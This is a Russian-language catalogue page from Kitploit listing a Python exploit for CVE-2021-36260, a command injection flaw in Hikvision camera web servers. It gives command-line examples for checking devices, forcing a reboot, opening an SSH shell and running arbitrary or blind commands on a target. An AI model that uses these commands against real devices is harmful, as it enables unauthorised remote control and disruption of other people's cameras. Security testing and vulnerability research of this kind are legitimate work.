Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-36260-hikvision — Python-эксплойт для CVE-2021-36260 - внедрение команд на веб-серверах Hikvision. Поддерживает безопасную/небезопасную проверку уязвимости, удаленное выполнение команд и доступ к SSH-оболочке на IoT-устройствах. | Kitploit
Инструменты/GitHubGitHub/shubtheone/cve-2021-36260-hikvision
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubshubtheone/cve-2021-36260-hikvision

CVE-2021-36260-hikvision

Python-эксплойт для CVE-2021-36260 - внедрение команд на веб-серверах Hikvision. Поддерживает безопасную/небезопасную проверку уязвимости, удаленное выполнение команд и доступ к SSH-оболочке на IoT-устройствах.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
7 месяцев назадЕщё не проверено

CVE-2021-36260

CVE-2021-36260 POC — уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать уязвимость для проведения атаки с внедрением команд, отправляя сообщения с вредоносными командами.

Название эксплойта: Hikvision Web Server Build 210702 — Command Injection

Автор эксплойта: bashis — исправление ошибок от shubtheone

Сайт производителя: https://www.hikvision.com/

Версия: 1.0

CVE: CVE-2021-36260

Ссылка: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

Вся заслуга принадлежит Watchful_IP

Примечание:

  1. Этот код не проверяет, является ли удаленное устройство устройством Hikvision.
  2. Большая часть моего интереса в этом коде была сосредоточена на том, как надежно обнаруживать уязвимые и/или эксплуатируемые устройства. Некоторые устройства легко обнаружить, проверить и использовать уязвимость, другие устройства могут быть уязвимы, но не так легко проверить и использовать. Я считаю, что комбинированный код проверки должен иметь очень высокую точность.
  3. 'безопасная проверка' (--check) попытается записать и прочитать для верификации. 'небезопасная проверка' (--reboot) попытается перезагрузить устройство для верификации.

[Примеры] Безопасная проверка уязвимости/верификации: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Безопасная и небезопасная проверка уязвимости/верификации: (будет использовать 'небезопасную проверку', только если 'безопасная проверка' не подтвердила) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Небезопасная проверка уязвимости/верификации: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Запуск и подключение к SSH-оболочке: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Выполнение команды: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Выполнение слепой команды: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

CVE-2021-36260-hikvision

Скачать инструмент